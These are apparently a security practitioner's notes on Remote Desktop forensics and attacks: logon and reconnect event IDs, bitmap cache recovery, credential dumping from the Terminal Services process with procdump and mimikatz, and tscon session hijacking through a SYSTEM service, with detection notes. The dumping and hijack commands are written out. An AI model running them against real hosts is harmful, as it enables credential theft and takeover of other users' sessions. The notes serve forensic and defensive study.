RDP

Event Logs:

13Cubed

Windows Security Log Event ID 4624 - An account was successfully logged on

4624 Logon Microsoft

Fantastic Windows Logon types and Where to Find Credentials in ThemAltered Security

Logon Types and Mimikatz Impact

Tracking and Analyzing Remote Desktop Connection Logs in Windows | Windows OS HubWindows OS Hub

RDP Log Hunting

Disconnect/Reconnect: 4778/4779

4778 Reconnect to existing session

4779 Disconnects from session

4779(S) A session was disconnected from a Window Station. - Windows SecurityMicrosoftLearn

4778(S) A session was reconnected to a Window Station. - Windows SecurityMicrosoftLearn

Forensics:

Souce and Destination artifacts:

Bitmap Cache

Do You Even Bitmap Cache, Bro?All Things DFIR

GitHub - ANSSI-FR/bmc-tools: RDP Bitmap Cache parserGitHub

Bitmap cache will cache still standing images of an RDP session so that they can be referenced instead of retransmitted. The purpose of this is to optimize RDP session.

We can leverage this artifact to collect what the TA saw during the RDP session. Useful for proving what a TA might've opened or actions they performed.

File Location:

• C:\Users\USERNAME\AppData\Local\Microsoft\Terminal Server Client\Cache\*

Cache files are stored in .bin files.

Execute bmc-tools:

bmc-tools.py -s ./ -d ./output

The output images will be saved to output folder.

We can then stitch together these image pieces using RDP Cache Sitcher.

GitHub - BSI-Bund/RdpCacheStitcher: RdpCacheStitcher is a tool that supports forensic analysts in reconstructing useful images out of RDP cache bitmaps.GitHub

Grab the compiled release version of the software and then open up the directory the image tiles are stored in. We can then stitch together tiles to make a complete image.

RDP Clipbaord Forensics

How to Perform Clipboard Forensics: ActivitiesCache.db, Memory Forensics and Clipboard History

RDP Lateral Movement

RDP credentials are stored in LSASS of the target computer. The plaintext passwords can be dumped from LSASS using mimikatz.

Introduced in Windows Server 2012 R2 and Windows 8.1, Restricted Admin mode provides additional security to remote logon scenarios. This mode of Remote Desktop causes the client application to perform a network logon challenge-response with the NT one-way function (NTOWF) or use a Kerberos service ticket when authenticating to the remote host. After the administrator is authenticated, the administrator does not have the respective account credentials in LSASS because they were not supplied to the remote host. Instead, the administrator has the computer account credentials for the session. Administrator credentials are not supplied to the remote host, so actions are performed as the computer account. Resources are also limited to the computer account, and the administrator cannot access resources with his own account.

Credentials Processes in Windows Authenticationdocsmsft

Dump Passwords in Terminal Services:

1. Query svchost running Terminal Services.

#service
sc queryex termservice

#task running rdpcorets
tasklist /M:rdpcorets.dll

#netstat for TermService
netstat -nob | Select-String TermService -Context 1

1. Dump process or select-string for password in memory.

#select string for password hint, difficult to find unless you know it.
strings -el svchost* | grep Password123 -C3

#dump process with task manager or procdump
procdump64.exe -ma 988 -accepteula C:\Users\pentestlab

#mimikatz rdp extract
privilege::debug
ts::logonpasswords

Detection:

• Look for .dmp files on the host.

Dumping Plaintext RDP credentials from svchost.exen00py1

Dump saved credentials via DPAPI:

Credential Manager Location:

• C:\Users\username\AppData\Local\Microsoft\Credentials

svchost – Penetration Testing LabPenetration Testing Lab

• Credentials are stored in Credential Manager, not in .rdp files.

• .rdp files reference credential manager for creds.

Detection:

Tscon to hijack open RDP connections:

1. Requires SYSTEM privs to accomplish.

psexec -s \\localhost cmd

Another method is to create a service that will connect selected session to ours.

1. Get all sessions information:

C:\Windows\system32>query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc            1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM

C:\Windows\system32>

1. Create service which will hijack user's session:

C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS

1. Start service:

net setart sesshijack

Detection:

• Event IDS4778 (logon) and4779(logoff) events can be used to figure out which desktop sessions got disconnected/reconnected.

• Tscon running as SYSTEM

• Tscon executed as SYSTEM from persistence method scheduled task, service, WMI, etc.

Passwordless RDP Session Hijacking Feature All Windows versions

RDP Hijacking for Lateral Movement with tsconRed Team Notes

Rogue RDP:

Rogue RDP – Revisiting Initial Access Methods - Black Hills Information SecurityBlack Hills Information Security

RDP Files:

.rdp files are plaintext config files.

• Credentials are stored in Credential Manager, not in .rdp files.

• .rdp files reference credential manager for creds

How to save RDP credentials into a file?Super User

Anti-Forensics:

Delete Recent RDP History Entries from the Start Menu and Taskbar (JumpList)Medium